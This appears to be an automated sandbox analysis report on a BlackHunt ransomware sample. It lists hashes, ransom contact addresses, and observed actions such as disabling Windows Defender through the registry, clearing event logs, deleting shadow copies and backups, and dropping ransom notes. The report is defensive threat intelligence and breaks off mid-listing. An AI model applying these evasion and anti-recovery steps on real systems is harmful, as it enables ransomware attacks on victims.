Analysis
-
max time kernel
91s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
26-12-2022 10:59
Static task
static1
Behavioral task
behavioral1
Sample
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Resource
win10v2004-20220901-en
General
-
Target
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
-
Size
718KB
-
MD5
d7a24de75b761cb98f580dafda4ba885
-
SHA1
86dc51cfc817937f9525b8aa2fa71e918288a44d
-
SHA256
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f
-
SHA512
c3fd50a296b4d251a614816756eb17632779c0ef0e72826d9d276ccae8b1689ca0523a22027509ce20bf125f858f713b08967ae55501c457bc9d8fca956b0e9e
-
SSDEEP
12288:YuLRIEFPULfzlsH5HCSSv5zEWptZ/Vlt:YeRIEF6zlsu5AWptRVlt
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
amike1096@gmail.com
onion746@onionmail.com
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
Processes:
fsutil.exefsutil.exepid process 1016 fsutil.exe 5108 fsutil.exe -
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Clears Windows event logs 1 TTPs 5 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepid process 3748 wevtutil.exe 1192 wevtutil.exe 4404 wevtutil.exe 3032 wevtutil.exe 2348 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 2060 bcdedit.exe 2528 bcdedit.exe 2876 bcdedit.exe 5004 bcdedit.exe -
Processes:
wbadmin.exewbadmin.exepid process 5072 wbadmin.exe 3772 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exef725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityService = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " reg.exe -
Processes:
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exefsutil.exedescription ioc process File opened (read-only) \??\A: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\G: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\K: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\Q: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\T: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\Y: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\B: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\N: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\M: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\O: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\J: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\V: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\Z: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\X: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\R: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\U: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\S: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\F: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\H: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\L: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\E: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\I: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\P: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Drops file in Program Files directory 64 IoCs
Processes:
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_AddBlue@1x.png f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_18.svg f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ar-ae\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansDemiBold.ttf f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-sl\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Common Files\Services\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\en-US.pak f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Google\CrashReports\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N.svg f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 476 vssadmin.exe 4168 vssadmin.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4532 taskkill.exe -
Modifies registry class 9 IoCs
Processes:
reg.exereg.exereg.exereg.execmd.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Black reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Black\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Black\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Black\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Black reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\ reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exepid process 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exepid process 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
vssvc.exewbengine.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exetaskkill.exedescription pid process Token: SeBackupPrivilege 3992 vssvc.exe Token: SeRestorePrivilege 3992 vssvc.exe Token: SeAuditPrivilege 3992 vssvc.exe Token: SeBackupPrivilege 4116 wbengine.exe Token: SeRestorePrivilege 4116 wbengine.exe Token: SeSecurityPrivilege 4116 wbengine.exe Token: SeSecurityPrivilege 3748 wevtutil.exe Token: SeBackupPrivilege 3748 wevtutil.exe Token: SeSecurityPrivilege 1192 wevtutil.exe Token: SeBackupPrivilege 1192 wevtutil.exe Token: SeSecurityPrivilege 4404 wevtutil.exe Token: SeBackupPrivilege 4404 wevtutil.exe Token: SeSecurityPrivilege 3032 wevtutil.exe Token: SeBackupPrivilege 3032 wevtutil.exe Token: SeSecurityPrivilege 2348 wevtutil.exe Token: SeBackupPrivilege 2348 wevtutil.exe Token: SeDebugPrivilege 4532 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4848 wrote to memory of 2284 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 2284 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 64 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 64 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 1908 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 1908 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 2284 wrote to memory of 3756 2284 cmd.exe reg.exe PID 2284 wrote to memory of 3756 2284 cmd.exe reg.exe PID 4848 wrote to memory of 1756 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 1756 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 4244 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 4244 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 1908 wrote to memory of 5068 1908 cmd.exe reg.exe PID 1908 wrote to memory of 5068 1908 cmd.exe reg.exe PID 4848 wrote to memory of 5084 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 5084 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 64 wrote to memory of 4616 64 cmd.exe reg.exe PID 64 wrote to memory of 4616 64 cmd.exe reg.exe PID 4848 wrote to memory of 4460 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 4460 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 1284 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 4848 wrote to memory of 1284 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe cmd.exe PID 1756 wrote to memory of 1740 1756 cmd.exe reg.exe PID 1756 wrote to memory of 1740 1756 cmd.exe reg.exe PID 4848 wrote to memory of 2944 4848 